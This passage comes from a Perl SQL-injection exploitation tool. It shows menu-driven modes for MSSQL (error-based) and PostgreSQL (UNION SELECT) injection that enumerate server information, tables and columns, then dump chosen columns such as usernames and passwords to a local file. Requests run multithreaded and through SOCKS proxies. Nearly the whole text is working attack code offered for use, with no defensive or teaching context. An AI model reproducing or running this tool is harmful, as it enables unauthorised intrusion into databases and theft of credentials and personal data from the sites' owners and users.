5466.            . "Accept: */*\r\n"
5467.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
5468.            . "Connection: close\r\n\r\n";
5469.    print "----------------------------------------\n";
5470.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
5471.    print "Timeout = 5 sec:\n";
5472.    print "----------------------------------------\n";
5473.    $socks_check = 0;
5474.    $check_socks = socks_check();
5475.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
5476.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
5477.   if ($current_proxy_host) {
5478.      $socks_check = 1;
5479.      print "Will use --> $proxy_message\n";
5480.   } else {
5481.      $socks_check = 0;
5482.      $proxy_message = "No";
5483.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
5484.   }
5485. }
5486. sub char($) {
5487.          $str1=$_[0];
5488.          $aa="";$bb="";
5489.          for ($i = 0; $i<length($str1); $i++ ) {
5490.              $aa =  ord(substr($str1,$i,1));
5491.              if ( $i == 0 ) {$bb= "char(" . $aa . ")";} else { $bb= $bb. "%2bchar(" . $aa . ")" ;}
5492.          }
5493.          return "$bb";
5494. }
5495. print "----------------------------------------------------------\n";
5496. print "               Choose mode:\n";
5497. print "----------------------------------------------------------\n";
5498. print "    [1] MSSQL inj system information\n";
5499. print "    [2] MSSQL inj get tables from information_schema (current DB)\n";
5500. print "    [3] MSSQL inj get column_name from table (current DB)\n";
5501. print "    [4] MSSQL inj get data from columns\n";
5502. print "----------------------------------------------------------\n";
5503. print "    [5]  Main menu\n";
5504. print "----------------------------------------------------------\n";
5505. $choice = <STDIN>;
5506. chomp $choice;
5507. print "Your choice: $choice\n";
5508. if ($choice == 1) {
5509.   $host = $host7;
5510.   open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
5511.      if ($ms_convert_in == 0) {
5512.          #$url1 = $ms_url . "(select" . $ms_spase . '@@version)' . $ms_close;
5513.          $url1 = $ms_url . '@@version' . $ms_close;
5514.      } else {
5515.          $url1 = $ms_url . 'convert(int,@@version)' . $ms_close;
5516.      }
5517.      if ($ms_convert_in == 0) {
5518.         $url2 = $ms_url . "(SeLect" . $ms_spase . "system_user)" . $ms_close;
5519.      } else {
5520.         $url2 = $ms_url . "convert(int,system_user)" . $ms_close;
5521.      }
5522.      if ($ms_convert_in == 0) {
5523.         $url3 = $ms_url . "(SeLect" . $ms_spase . "db_name())" . $ms_close;
5524.      } else {
5525.         $url3 = $ms_url . "convert(int,db_name())" . $ms_close;
5526.      }
5527.      @array = ($url1,$url2,$url3);
5528.      $size = @array; #???????? ?????? ???????
5529.      $thr = $kol_threads; # ???-?? ???????
5530.      $num = -1; # ?? ????????
5531.      print "-----------------------------------------\n";
5532.      print "System information:\n";
5533.      print "-----------------------------------------\n";
5534.      print FILE  "-----------------------------------------\n";
5535.      print FILE  "HOST: $host\n";
5536.      print FILE "-----------------------------------------\n";
5537.      print FILE "System information:\n";
5538.      print FILE "-----------------------------------------\n";
5539.      print "Request method - $method\n";
5540.      print "Threads - $kol_threads\n";
5541.      print "Proxy - $proxy_message\n";
5542.      print "----------------------\n";
5543.      for(0..$thr) {
5544.         $trl[$_] = threads->create(\&gets666);
5545.      }
5546.      for(0..$thr) {
5547.         $trl[$_]->join;
5548.      }
5549.      sub gets666 {
5550.         $| = 1;
5551.         while ($num<$size) {
5552.             { lock($num);
5553.             $num++; }
5554.             $current = $array[$num];
5555.             if ($num == 0) {$mess = '@@version: '}
5556.             if ($num == 1) {$mess = "system_user: "}
5557.             if ($num == 2) {$mess = "db_name(): "}
5558.             $content = scan_url();
5559.             if ($content =~ m/$ms_pattern_sys_tab/imgs or $content =~ m/$ms_pattern_sys_tab1/imgs) {
5560.                   print $mess . $1 . "\n";
5561.                   print FILE $mess . $1 . "\n";
5562.             }
5563.             print $num . "\r";
5564.             sleep $pause;
5565.         }
5566.      }
5567.      print "----------\n";
5568.      print "Saved in " . "z_" . $host . ".txt\n";
5569.      close(FILE);
5570.      goto START_mssql;
5571. }
5572. if ($choice == 2) {
5573.      $host = $host7;
5574.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5575.      print FILE "=============================================" . "\n";
5576.      print FILE "Tables in information_schema:" . "\n";
5577.      print FILE "=============================================" . "\n";
5578.      print "-----------------------------------------\n";
5579.      print "Request method - $method\n";
5580.      print "Threads - $kol_threads\n";
5581.      print "Proxy - $proxy_message\n";
5582.      print "----------------------\n";
5583.      ## ???-?? ?????? ? in_sch.tables
5584.      $current = $ms_url . "convert(int,(SeLeCT" . $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM". $ms_spase . "INfORmATION_ScHEMA.TaBLeS))" . $ms_close;
5585.        $content = scan_url();
5586.      $column_name_p1 = $content;
5587.      if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
5588.         ($a,$column_name_p) = split(/\'\^\'/, $1);
5589.      }
5590.      $column_name_p=10;
5591.      print "Tables in information_schema.tables - $column_name_p\n";
5592.      print "------------------------------------------------------\n";
5593.      $thr = $kol_threads; # ???-?? ???????
5594.      $num = -1; # ?? ????????
5595.      for(0..$thr) {
5596.           $trl[$_] = threads->create(\&gets691);
5597.      }
5598.      for(0..$thr) {
5599.           $trl[$_]->join;
5600.      }
5601.      sub gets691 {
5602.             $| = 1;
5603.             while ($num < $column_name_p) {
5604.                { lock($num);
5605.                $num++; }
5606.                $i = $num;
5607.                if ($ms_convert_in == 0) {
5608.                      $current = $ms_url . "(SeLect" . $ms_spase . "max(table_name)" . $ms_spase . "from" . $ms_spase ."(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."where". $ms_spase ."table_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."order". $ms_spase . "by". $ms_spase ."table_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."table_name)a)" . $ms_close;
5609. print FILE "  "  . $current . "\n";
5610.  
5611.                } else {
5612.                      $current = $ms_url . "convert(int,(select" . $ms_spase . "max(table_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."where". $ms_spase ."table_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."order". $ms_spase . "by". $ms_spase ."table_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."table_name)a))"  . $ms_close;
5613. print FILE "  "  . $current . "\n";
5614.  
5615.                }
5616.                print FILE "  "  . $current . "\n";
5617.                $content = scan_url();
5618.                if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {
5619.  
5620.                     print "   " . $1 . "\n";
5621.                     print FILE "  "  . $1 . "\n";
5622.                }
5623.                print $num . "\r";
5624.                sleep $pause;
5625.  
5626.             }
5627.      }
5628.      print "----------\n";
5629.      print "Saved in " . "z_" . $host . ".txt\n";
5630.      close(FILE);
5631.      goto START_mssql;
5632. }
5633. if ($choice == 3) {
5634.      $host = $host7;
5635.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5636.      print "-----------------------------------------\n";
5637.      print "Enter the table_name: ";
5638.      $choice1 = <STDIN>;
5639.      chomp $choice1;
5640.      $table = $choice1;
5641.      print "Table: $choice1\n";
5642.      print "----------\n";
5643.      print FILE  "-----------------------------------------\n";
5644.      print FILE  "Columns from table [ $choice1 ]\n";
5645.      print FILE  "-----------------------------------------\n";
5646.      print "Get columns from " . $choice1 .  ":\n";
5647.      print "------------------------------------------------\n";
5648.      $table = char($choice1);
5649.      print "-----------------------------------------\n";
5650.      print "Request method - $method\n";
5651.      print "Threads - $kol_threads\n";
5652.      print "Proxy - $proxy_message\n";
5653.      print "----------------------\n";
5654.      ## ???-?? ??????? ? in_sch.columns
5655.      $current = $ms_url . "convert(int,(SELECT" . $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM". $ms_spase . "INFORMATION_SCHEMA.columns" . $ms_spase . "where" . $ms_spase . "table_name=" . $table . "))" . $ms_close;
5656.      $content = scan_url();
5657.      $column_name_p1 = $content;
5658.      if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
5659.         ($a,$column_name_p) = split(/\'\^\'/, $1);
5660.      }
5661.      print "Columns in $choice1 - $column_name_p\n";
5662.      print "------------------------------------------------------\n";
5663.      $thr = $kol_threads; # ???-?? ???????
5664.      $num = -1; # ?? ????????
5665.      $sms = 0;
5666.      $column_temp_ms = "";
5667.      for(0..$thr) {
5668.           $trl[$_] = threads->create(\&gets692);
5669.      }
5670.      for(0..$thr) {
5671.           $trl[$_]->join;
5672.      }
5673.      sub gets692 {
5674.             $| = 1;
5675.             while ($num < $column_name_p) {
5676.                { lock($num);
5677.                $num++; }
5678.                $i = $num;
5679.                if ($ms_convert_in == 0) {
5680.                      $current = $ms_url . "(select" . $ms_spase . "max(column_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."column_name". $ms_spase ."from". $ms_spase ."information_schema.columns". $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase . "and". $ms_spase ."column_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "column_name". $ms_spase ."from". $ms_spase ."information_schema.columns" . $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase ."order". $ms_spase . "by". $ms_spase ."column_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."column_name)a)" . $ms_close;
5681. print FILE "  "  . $current . "\n";
5682.  
5683.                } else {
5684.                      $current = $ms_url . "convert(int,(select" . $ms_spase . "max(column_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."column_name". $ms_spase ."from". $ms_spase ."information_schema.columns". $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase . "and". $ms_spase ."column_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "column_name". $ms_spase ."from". $ms_spase ."information_schema.columns" . $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase ."order". $ms_spase . "by". $ms_spase ."column_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."column_name)a))"  . $ms_close;
5685. print FILE "  "  . $current . "\n";
5686.  
5687.                }
5688.                $content = scan_url();
5689.                if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {
5690.                     print "   " . $1 . "\n";
5691.                     print FILE "  "  . $1 . "\n";
5692.                     #print FILE "  "  . $current . "\n";
5693.                }
5694.                print $num . "\r";
5695.                sleep $pause;
5696.  
5697.             }
5698.      }
5699.      print "----------\n";
5700.      print "Saved in " . "z_" . $host . ".txt\n";
5701.      close(FILE);
5702.      goto START_mssql;
5703. }
5704. if ($choice == 4) {
5705.     $host = $host7;
5706.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5707.     print "-----------------------------------------\n";
5708.     print "Enter the table_name: ";
5709.     $choice1 = <STDIN>;
5710.     chomp $choice1;
5711.     $table = $choice1;
5712.     print "Table: $table\n";
5713.     print "-----------------------------------------\n";
5714.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
5715.     $choice = <STDIN>;
5716.     chomp $choice;
5717.     $column_name1 = $choice;
5718.     $column_name = "cast(" . $choice . $ms_spase . "as" . $ms_spase . "varchar)";
5719.     @column_spis = split(/,/,$column_name);
5720.     $size = @column_spis;
5721.     if ($size > 1) {
5722.        $column_name = "cast(";
5723.        $a = 0;
5724.        while ($a < $size) {
5725.         if ($a == ($size-1)) {
5726.           $column_name .= $column_spis[$a] . $ms_spase . "as" . $ms_spase . "varchar)";
5727.         } else {
5728.           $column_name .= $column_spis[$a] . $ms_spase . "as" . $ms_spase . "varchar)%2Bchar(58)%2Bcast(";
5729.         }
5730.           $a++;
5731.        }
5732.     }
5733.     print FILE  "-----------------------------------------\n";
5734.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $table . " ]\n";
5735.     print FILE  "-----------------------------------------\n";
5736.     print "Dump column(s): [ " . $column_name1 . " ] from [ " .$table . " ]\n";
5737.     print "-----------------------------------------\n";
5738.     ## ?????? ???-?? ???????? ?? ??????? #
5739.     print "Count data from [ $choice1  ]\n";
5740.     $current = $ms_url . "convert(int,(select" . $ms_spase . "TOP" . $ms_spase . "1". $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM" . $ms_spase . $table . "))" . $ms_close;
5741.     $content = scan_url();
5742.     $column_name_p1 = $content;
5743.     if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
5744.         ($a,$column_name_p) = split(/\'\^\'/, $1);
5745.     }
5746.     print "$column_name_p\n";
5747.     print "----------\n";
5748.     print "Get ALL data from " . $table . " (" . $column_name_p . ") ? (1/0): ";
5749.     $choice = <STDIN>;
5750.     chomp $choice;
5751.     $thr = $kol_threads; # ???-?? ???????
5752.     if ($choice == 1) {
5753.           $num = 0; # ?? ????????
5754.     } else {
5755.           print "Enter START_position: ";
5756.           $choice1 = <STDIN>;
5757.           chomp $choice1;
5758.           $num = $choice1-1;
5759.           print "Enter END_position: ";
5760.           $choice2 = <STDIN>;
5761.           chomp $choice2;
5762.           $column_name_p = $choice2-1;
5763.           print "Dump records from [" . ($num+1) . "] to [" . ($column_name_p+1) . "]\n";
5764.     }
5765.     print "-----------------------------------------\n";
5766.     print "Request method - $method\n";
5767.     print "Threads - $kol_threads\n";
5768.     print "Proxy - $proxy_message\n";
5769.     print "----------------------\n";
5770.     ## ?????? ?????? ?? ??????? ##
5771.     for(0..$thr) {
5772.           $trl[$_] = threads->create(\&gets668);
5773.     }
5774.     for(0..$thr) {
5775.           $trl[$_]->join;
5776.     }
5777.     sub gets668 {
5778.             $| = 1;
5779.             while ($num<$column_name_p) {
5780.                { lock($num);
5781.                $num++; }
5782.                $i = $num;
5783.                if ($ms_convert_in == 0) {
5784.                     $current = $ms_url . "(select" . $ms_spase . "top" . $ms_spase . "1". $ms_spase . $column_name . $ms_spase . "from" . $ms_spase . $table . $ms_spase . "where" . $ms_spase . $column_name . $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . $column_name . $ms_spase ."from". $ms_spase . $table . $ms_spase . "order". $ms_spase . "by". $ms_spase . $column_name1 . ")". $ms_spase ."order". $ms_spase ."by". $ms_spase . $column_name1 . ")" . $ms_close;
5785.                } else {
5786.                     $current = $ms_url . "convert(int,(select" . $ms_spase . "top" . $ms_spase . "1". $ms_spase . $column_name . $ms_spase . "from" . $ms_spase . $table . $ms_spase . "where" . $ms_spase . $column_name . $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . $column_name . $ms_spase ."from". $ms_spase . $table . $ms_spase . "order". $ms_spase . "by". $ms_spase . $column_name1 . ")". $ms_spase ."order". $ms_spase ."by". $ms_spase . $column_name1 . "))" .  $ms_close;
5787.                }
5788.                $content = scan_url();
5789.                if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {
5790.                     print "   " . $1 . "\n";
5791.                     print FILE "  "  . $1 . "\n";
5792.                }
5793.                print $num . "\r";
5794.                sleep $pause;
5795.  
5796.             }
5797.     }
5798.     print "----------\n";
5799.     print "Saved in " . "z_" . $host . ".txt\n";
5800.     close(FILE);
5801.     goto START_mssql;
5802. } # end MSSQL
5803. if ($choice == 5) {goto START_global}
5804. }
5805. ######################################################################################################################
5806. ## PostgreSQL ##############
5807. if ($choice == 3) {
5808. START_ps:
5809. $host = $host8;
5810. if ($use_socks == 1 && $socks_check == 0 && $https_flag == 0) {
5811.   $check_url = $host;
5812.   our $query = "GET / HTTP/1.$http_protocol\r\n"
5813.            . "Host: $check_host\r\n"
5814.            . "Referer: http://" . $check_url . "\r\n"
5815.            . "Accept: */*\r\n"
5816.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
5817.            . "Connection: close\r\n\r\n";
5818.    print "----------------------------------------\n";
5819.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
5820.    print "Timeout = 5 sec:\n";
5821.    print "----------------------------------------\n";
5822.    $socks_check = 0;
5823.    $check_socks = socks_check();
5824.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
5825.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
5826.   if ($current_proxy_host) {
5827.      $socks_check = 1;
5828.      print "Will use --> $proxy_message\n";
5829.   } else {
5830.      $socks_check = 0;
5831.      $proxy_message = "No";
5832.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
5833.   }
5834. }
5835. sub char_p($) {
5836.          $str1=$_[0];
5837.          $aa="";$bb="";
5838.          for ($i = 0; $i<length($str1); $i++ ) {
5839.              $aa =  ord(substr($str1,$i,1));
5840.              if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "||chr(" . $aa . ")" ;}
5841.          }
5842.          return "$bb";
5843. }
5844. print "----------------------------------------------------------\n";
5845. print "               Choose mode:\n";
5846. print "----------------------------------------------------------\n";
5847. print "    [1] PostgreSQL inj system information\n";
5848. print "    [2] PostgreSQL inj get tables from information_schema\n";
5849. print "    [3] PostgreSQL inj get column_name from table\n";
5850. print "    [4] PostgreSQL inj get data from columns\n";
5851. print "    =======================================================\n";
5852. print "    [5] Main menu\n";
5853. print "----------------------------------------------------------\n";
5854. $choice = <STDIN>;
5855. chomp $choice;
5856. print "Your choice: $choice\n";
5857. ####################################################################################################################
5858. ## UNION+SELECT method ##
5859. if ($p_method == 0) {
5860. if ($p_union_select_url =~ m/^https:\/\/?([^\/]+)/i) {
5861.        $host8 = $1;
5862.        $https_flag = 1;
5863.        print "----------------------\n";
5864.        print "HTTPS mode enabled\n";
5865.        print "----------------------\n";
5866. }
5867. $host = $host8;
5868. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
5869.     print "-----------------------------------------\n";
5870.     print "Authorization required, wait please....";
5871.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
5872.     $ck1 = collect($answ1);
5873.     $https_auth_check = 1;
5874.     print " DONE\n";
5875.     print "-----------------------------------------\n";
5876. }
5877. print "========================================\n";
5878. print " PostgreSQL UNION+SELECT method\n";
5879. print "========================================\n";
5880. if ($choice == 1) {
5881.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
5882.      $url1 = $p_sql_start . $p_sql_pref1 .  "cast(version()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
5883.      $url2 = $p_sql_start . $p_sql_pref1 .  "cast(current_user" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
5884.      $url3 = $p_sql_start . $p_sql_pref1 .  "cast(current_database()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
5885.      $url4 = $p_sql_start . $p_sql_pref1 .  "cast(inet_server_addr()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
5886.      $url5 = $p_sql_start . $p_sql_pref1 .  "cast(inet_server_port()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
5887.      @array = ($url1,$url2,$url3,$url4,$url5);
5888.      $size = @array; #???????? ?????? ???????
5889.      $thr = $kol_threads; # ???-?? ???????
5890.      $num = -1; # ?? ????????
5891.      print "-----------------------------------------\n";
5892.      print "System information:\n";
5893.      print "-----------------------------------------\n";
5894.      print FILE  "-----------------------------------------\n";
5895.      print FILE  "HOST: $host\n";
5896.      print FILE "-----------------------------------------\n";
5897.      print FILE "System information:\n";
5898.      print FILE "-----------------------------------------\n";
5899.      print "Request method - $method\n";
5900.      print "Threads - $kol_threads\n";
5901.      print "Proxy - $proxy_message\n";
5902.      print "----------------------\n";
5903.      for(0..$thr) {
5904.         $trl[$_] = threads->create(\&gets670);
5905.      }
5906.      for(0..$thr) {
5907.         $trl[$_]->join;
5908.      }
5909.      sub gets670 {
5910.         $| = 1;
5911.         while ($num<$size) {
5912.             { lock($num);
5913.             $num++; }
5914.             $current = $array[$num];
5915.             if ($num == 0) {$mess = 'version(): '}
5916.             if ($num == 1) {$mess = "current_user: "}
5917.             if ($num == 2) {$mess = "current_database(): "}
5918.             if ($num == 3) {$mess = "inet_server_addr(): "}
5919.             if ($num == 4) {$mess = "inet_server_port(): "}
5920.             $content = scan_url();
5921.             if ($content =~ m/ussr(.*?)ussr/imgs) {
5922.                   print $mess . $1 . "\n";
5923.                   print FILE $mess . $1 . "\n";
5924.             }
5925.             print $num . "\r";
5926.             sleep $pause;
5927.         }
5928.      }
5929.      print "----------\n";
5930.      print "Saved in " . "z_" . $host . ".txt\n";
5931.      close(FILE);
5932.      goto START_ps;
5933. }
5934. if ($choice == 2) {
5935.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5936.      $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_filtr; # ??????? ???-?? ??????
5937.      $content = scan_url();
5938.      $tab_num = $content;
5939.      $tab_num =~ m/ussr(.*?)ussr/imgs;
5940.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
5941.      print "-----------------------------------------\n";
5942.      print "Tables in information_schema.tables - $1\n";
5943.      print "-----------------------------------------\n";
5944.      ## start from2 ##
5945.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
5946.      $choice = <STDIN>;
5947.      chomp $choice;
5948.      $thr = $kol_threads; # ???-?? ???????
5949.      if ($choice == 1) {
5950.           $num = -1; # ?? ????????
5951.  
5952.      } else {
5953.           print "Enter START_position: ";
5954.           $choice1 = <STDIN>;
5955.           chomp $choice1;
5956.           $num = $choice1-2;
5957.           print "Enter END_position: ";
5958.           $choice2 = <STDIN>;
5959.           chomp $choice2;
5960.           $tab_num = $choice2-1;
5961.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
5962.      }
5963.      print "-----------------------------------------\n";
5964.      ## end from2
5965.      print FILE  "-----------------------------------------\n";
5966.      print FILE  "Tables in information_schema.tables - $1\n";
5967.      print FILE  "-----------------------------------------\n";
5968.      $url12 = $p_sql_start . $p_sql_pref1 . "cast(table_name" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_plus . "limit" . $p_plus . "1";
5969.      print "Request method - $method\n";
5970.      print "Threads - $kol_threads\n";
5971.      print "Proxy - $proxy_message\n";
5972.      print "----------------------\n";
5973.      for(0..$thr) {
5974.          $trl[$_] = threads->create(\&gets671);
5975.      }
5976.      for(0..$thr) {
5977.          $trl[$_]->join;
5978.      }
5979.      sub gets671 {
5980.        $| = 1;
5981.        while ($num<$tab_num) {
5982.          { lock($num);
5983.          $num++; }
5984.          $current = $url12 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
5985.          $content = scan_url();
5986.          if ($content =~ m/ussr(.*?)ussr/imgs) {
5987.                   print $1 . "\n";
5988.                   print FILE $1 . "\n";
5989.          }
5990.          print $num . "\r";
5991.          sleep $pause;
5992.  
5993.        }
5994.      }
5995.     print "----------\n";
5996.     print "Saved in " . "z_" . $host . ".txt\n";
5997.     close(FILE);
5998.     goto START_ps;
5999. }
6000. if ($choice == 3) {
6001.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6002.     print "-----------------------------------------\n";
6003.     print "Enter the table_name: ";
6004.     $choice = <STDIN>;
6005.     chomp $choice;
6006.     print "Table: $choice\n";
6007.     print "----------\n";
6008.     print FILE  "-----------------------------------------\n";
6009.     print FILE  "Table [ $choice ]\n";
6010.     print FILE  "-----------------------------------------\n";
6011.     $table_name1 = $choice;
6012.     $table_name = char_p ($choice);
6013.     $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_filtr;
6014.     $content = scan_url();
6015.     $content =~ m/ussr(.*?)ussr/imgs;
6016.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
6017.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
6018.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
6019.     print "----------\n";
6020.     ## ?????? ??????? ##
6021.     $thr = $kol_threads; # ???-?? ???????
6022.     $num = -1; # ?? ????????
6023.     print "Request method - $method\n";
6024.     print "Threads - $kol_threads\n";
6025.     print "Proxy - $proxy_message\n";
6026.     print "----------------------\n";
6027.     $url15 = $p_sql_start . $p_sql_pref1 . "cast(column_name" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_plus . "limit" . $p_plus . "1";
6028.     print FILE  "Columns in " . $table_name1 . "\n";
6029.     for(0..$thr) {
6030.          $trl[$_] = threads->create(\&gets672);
6031.     }
6032.     for(0..$thr) {
6033.          $trl[$_]->join;
6034.     }
6035.     sub gets672 {
6036.        $| = 1;
6037.        while ($num<$colum_number) {
6038.          { lock($num);
6039.          $num++; }
6040.          $current = $url15 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
6041.          $content = scan_url();
6042.          if ($content =~ m/ussr(.*?)ussr/imgs) {
6043.                   print "   " . $1 . "\n";
6044.                   print FILE "  "  . $1 . "\n";
6045.          }
6046.          print $num . "\r";
6047.          sleep $pause;
6048.  
6049.        }
6050.     }
6051.     print FILE "----------\n";
6052.     print "----------\n";
6053.     print "Saved in " . "z_" . $host . ".txt\n";
6054.     close(FILE);
6055.     goto START_ps;
6056. }
6057. if ($choice == 4) {
6058.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6059.     print "-----------------------------------------\n";
6060.     print "Enter the table_name: ";
6061.     $choice = <STDIN>;
6062.     chomp $choice;
6063.     $table_name = $choice;
6064.     print "Table: $table_name\n";
6065.     print "-----------------------------------------\n";
6066.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
6067.     $choice = <STDIN>;
6068.     chomp $choice;
6069.     $column_name1 = $choice;
6070.     $column_name = $choice;
6071.     @column_spis = split(/,/,$column_name);
6072.     $size = @column_spis;
6073.     if ($size > 1) {
6074.        $column_name = "";
6075.        $a = 0;
6076.        while ($a < $size) {
6077.         if ($a == ($size-1)) {
6078.           $column_name .= $column_spis[$a];
6079.         } else {
6080.           $column_name .= $column_spis[$a] . "||chr(58)||";
6081.         }
6082.           $a++;
6083.        }
6084.     }
6085.     print FILE  "-----------------------------------------\n";
6086.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
6087.     print FILE  "-----------------------------------------\n";
6088.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
6089.     print "-----------------------------------------\n";
6090.     ## ?????? ???-?? ???????? ?? ??????? #
6091.     print "Count data from [ $table_name  ]\n";
6092.     $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . $table_name . $p_filtr;
6093.     $content = scan_url();
6094.     $column_name_p = $content;
6095.     $column_name_p =~ m/ussr(.*?)ussr/imgs;
6096.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
6097.     print "$column_name_p\n";
6098.     print "----------\n";
6099.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
6100.     $choice = <STDIN>;
6101.     chomp $choice;
6102.     $thr = $kol_threads; # ???-?? ???????
6103.     if ($choice == 1) {
6104.          $num = -1; # ?? ????????
6105.     } else {
6106.          print "Enter START_position: ";
6107.          $choice1 = <STDIN>;
6108.          chomp $choice1;
6109.          $num = $choice1-2;
